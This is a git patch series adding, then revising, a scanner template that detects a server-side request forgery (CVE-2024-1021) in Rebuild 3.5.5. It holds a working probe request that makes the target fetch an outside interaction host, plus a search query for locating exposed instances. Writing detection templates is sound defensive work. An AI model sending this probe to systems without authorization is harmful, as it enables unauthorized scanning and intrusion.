From 9ca4920ad81b2e4a1ae3a64d146fe8ebf0ebf6ef Mon Sep 17 00:00:00 2001 From: bmcxxx Date: Sun, 25 Feb 2024 12:56:05 +0800 Subject: [PATCH 1/2] Add CVE-2024-1021 --- http/cves/2024/CVE-2024-1021.yaml | 36 +++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1021.yaml diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml new file mode 100644 index 0000000000..3d45b8445b --- /dev/null +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-1021 + +info: + name: Rebuild <= 3.5.5 - Server-Side Request Forgery + author: BMCel + severity: medium + description: | + There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources. + remediation: | + Apply the latest security patches or updates provided by Rebuild to fix this vulnerability. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-1021 + - https://nvd.nist.gov/vuln/detail/CVE-2024-1021 + - https://github.com/getrebuild/rebuild + metadata: + max-request: 1 + tags: cve2024,cve,rebuild,ssrf + +http: + - raw: + - | + GET /filex/read-raw?url=http://{{interactsh-url}}&cut=1 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 From dc6427607f68d96d57d1fa3703f9ad00990ed5c4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 25 Feb 2024 14:30:15 +0530 Subject: [PATCH 2/2] updated matchers, payload & request --- http/cves/2024/CVE-2024-1021.yaml | 28 +++++++++++++--------------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index 3d45b8445b..7e6acd833a 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -11,26 +11,24 @@ info: remediation: | Apply the latest security patches or updates provided by Rebuild to fix this vulnerability. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-1021 - - https://nvd.nist.gov/vuln/detail/CVE-2024-1021 - https://github.com/getrebuild/rebuild + - https://nvd.nist.gov/vuln/detail/CVE-2024-1021 metadata: max-request: 1 + verified: true + fofa-query: icon_hash="871154672" tags: cve2024,cve,rebuild,ssrf http: - - raw: - - | - GET /filex/read-raw?url=http://{{interactsh-url}}&cut=1 HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1" - matchers-condition: and matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains(body_2, "

Interactsh Server

")' + - '!contains(body_1, "

Interactsh Server

")' + - 'status_code_2 == 200' + condition: and